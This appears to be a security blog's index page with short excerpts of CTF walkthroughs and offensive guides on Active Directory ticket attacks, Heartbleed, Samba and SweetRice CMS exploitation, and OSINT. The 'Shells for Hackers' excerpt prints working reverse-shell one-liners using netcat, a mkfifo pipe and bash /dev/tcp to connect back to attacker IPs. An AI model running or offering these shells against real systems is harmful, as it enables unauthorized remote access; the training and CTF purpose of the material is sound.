Golden Ticket Attacks

Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to vulnerabilities. The Golden Ticket attack exemplifies a critical AD weakness, promising attackers unparalleled access once exploited. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag […]

Shells for Hackers

This cheat sheet is an essential guide, designed to aid in swiftly deploying shells across various computing environments. Use it as a go-to reference. Reverse Shells Netcat listener> nc -nlvp 31337 nc -e /bin/sh 10.10.10.10 31337 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 31337 >/tmp/f Bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh […]

Exploiting HeartBleed for OSCP | Valentine HackTheBox

HackTheBox presents “Valentine”, a vulnerable machine centered around OpenSSL’s well-known HeartBleed issue. This challenge pushes us to grapple with essential security concepts. The path to the flags involves decoding messages and navigating Linux for privilege escalation. In this walkthrough, I’ll share my approach to Valentine, highlighting the steps and strategies I used. Let’s dive into […]

SweetRice CMS Exploitation | LazyAdmin TryHackMe

LazyAdmin is a machine available on TRYHACKME, designed for those looking to hone their skills in a controlled environment. This box provides opportunities to delve into web application exploration, exploit a documented CVE within a CMS, and understand a fundamental privilege escalation technique. Key Takeaways Enumeration: Systematic exploration to identify open ports, active services, […]

Exploiting Samba with Metasploit | HackTheBox

Lame is a beginner-friendly box available on HackTheBox. In this walkthrough, I’ll go through Nmap, SMB file shares, anonymous FTP logins, Searchsploit, and Metasploit to tackle this machine. Insights Vulnerability Scanning: Utilizing tools like Nmap to identify open ports and potential weaknesses in services on a target system. Exploitation Techniques: Employing both automated tools […]

OSINT For CTF

Passive Information Gathering in CTFs: A Deep Dive into Essential Tools and Techniques Introduction Passive information gathering is a vital phase in Capture The Flag (CTF) competitions. This preliminary reconnaissance step involves collecting data about a target or network without actively interacting with it. Successful CTF participants often use a range of tools and techniques […]

Pass the Ticket: An AD Attack Method

Pass-the-Ticket (PtT) is a popular method of attack in AD environments, capitalizing on Kerberos tickets to gain unauthorized access. This guide breaks down PtT for the active CTF player, offering actionable code and clear steps to execute under time pressure. PtT Basics In Kerberos authentication, tickets, rather than passwords, grant access to resources. If an […]